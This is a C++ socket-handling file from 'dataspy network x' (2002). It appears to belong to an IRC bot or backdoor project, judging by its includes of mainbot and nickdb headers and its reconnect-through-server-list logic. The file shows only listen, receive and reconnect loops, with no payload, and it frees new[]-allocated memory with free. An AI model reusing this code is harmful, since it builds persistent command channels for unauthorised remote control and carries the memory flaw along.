 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	DSNXSockets.cpp - Our socket class

	Last revised : 31st March 2002

  */


#include <windows.h>
#include "../include/dsnxsockets.h"
#include "../include/tcp.h"
#include "../include/dsnxsockets.h"
#include "../include/mainbot.h"
#include "../include/shared.h"
#include "../include/nickdb.h"



CLinkedList *g_IOList = NULL;

DSNXSocket::DSNXSocket(char *server,USHORT port) : CLinkedList(0) {
	
	bStopUse = false;
	if (server) {
		cServer = new char[strlen(server) + 1];
		strcpy(cServer,server);
	} else
		cServer = 0;
	iPort = port;	
	s =INVALID_SOCKET;
	CurThreads =0;
	wUniqueID = DSNXSocket_ID;
}

DSNXSocket::~DSNXSocket() {

	HardClose(s);
	
	bStopUse = true;
	/* 
		Wait for other threads using this socket to quit - they must decrease their count! 
	*/
	while (CurThreads > 0 )
		Sleep(10);
	
	Remove(&g_IOList);

	if(cServer)
		free(cServer);
}

DWORD DSNXSocket::Kill (LPVOID params) {

	delete this;
	return 0;
}

DWORD DSNXSocket::Dome (LPVOID params) {


	return 0;
}

DSNXSocket *GetPFromSocketNum (SOCKET iSocket,DSNXSocket *Starting) {

	CLinkedList *list = Starting;

	if (Starting == 0)
		return 0;
	
	do {

		if (((DSNXSocket*)(list))->s == iSocket)
			return (DSNXSocket*)list;

		list = list->Get(1);

	} while (list != Starting);

	return 0;
}


DSNXSocket *SearchFor (SHORT iSkip,WORD wType,char *cSearch,DSNXSocket *Starting) {

	DSNXSocket *list = Starting;

	if (Starting ==0)
		return 0;

	do {

		if ( (wType == list->wUniqueID || !wType) &&
			cSearch ? (((DSNXSocket*)(list))->cServer ? !stricmp(((DSNXSocket*)(list))->cServer,cSearch) : 0) : 1 ) {
			if (!iSkip--)
				return (DSNXSocket*)list;
		}	



		list = (DSNXSocket*)list->Get(1);

	} while (list != Starting);

	return 0;
}
	 



/*
	Loops to accept incoming connections.
	When one is detected calls socket->Dome();	
	
 */

DWORD DSNXListenLoop(DSNXSocket *socket) {

	SOCKET The_Socket = INVALID_SOCKET;
	TIMEVAL tm = {0,0};
	int nRet;
	fd_set rfds;

	if ( (The_Socket = TCPListen(socket->iPort)) == INVALID_SOCKET) {

		socket->bStopUse = true;

		while (socket->CurThreads > 0 )
			Sleep(10);

		socket->Kill(0);

		return 0;
	}

	socket->CurThreads ++;
	socket->s = The_Socket;

	while (socket->bStopUse == false) {

		FD_ZERO(&rfds);
		FD_SET(The_Socket,&rfds);
		nRet=select(1,&rfds,NULL,NULL,&tm);

		if (nRet == SOCKET_ERROR) {

			break;

		} else if (nRet) {
	
			socket->Dome(0);
		}
		Sleep(ACTION_SLEEP);
	}

	socket->CurThreads --;

	socket->Kill(0);

	return 0;
}

/*
	Loops to receive data. When data is waiting, calls socket->Dome();

	
	
 */

DWORD DSNXReceiveLoop(DSNXSocket *socket)
{
	DWORD len;
	TIMEVAL tm = {0,0};
	fd_set read_fds;
	char buf[1];

	socket->CurThreads ++;

	while (socket->bStopUse == false) {

		FD_ZERO(&read_fds);
		FD_SET(socket->s,&read_fds);

		select(0,&read_fds,NULL,NULL,&tm);

		if (FD_ISSET(socket->s,&read_fds)) {

			len = recv(socket->s,buf,1,MSG_PEEK);

			if (!len || len == SOCKET_ERROR) {

				break;

			} else {

				ioctlsocket(socket->s,FIONREAD,&len);
				if (len) {
					socket->Dome (0);
				}
			}
		}
		Sleep(ACTION_SLEEP);
	}

	socket->CurThreads --;

	/* 
		Call the function to deal with socket closes 

		We DONT/CANT delete the socket, as this function may decide to continue using it.
	*/
	socket->Kill(0);

	return 0;
}

#include "../include/serverlist.h"

SOCKET SmartConnect(char* cServer,UINT iPort,USHORT max_seconds) {

	CLinkedList * ll =0;
	USHORT prev = 0;
	SOCKET The_Socket= INVALID_SOCKET;
	ULONG start = GetTickCount();

	if (g_ServerList != 0) {

		ll = g_ServerList->Get(cServer);
	}

	do
	{
		if ((GetTickCount() - start) / 1000 > max_seconds)
			return INVALID_SOCKET;

		//Check For Server List
		if (ll) {
			if (!prev)
				prev=Random(0,((ServerList*)ll)->count);
			else
				prev++;

			cServer = ((ServerList*)ll)->servers[prev%((ServerList*)ll)->count];

		}

		//Connect the socket
		The_Socket = TCPConnect(cServer,iPort);

	}while (The_Socket == INVALID_SOCKET);

	//Right connected
	return The_Socket;
}
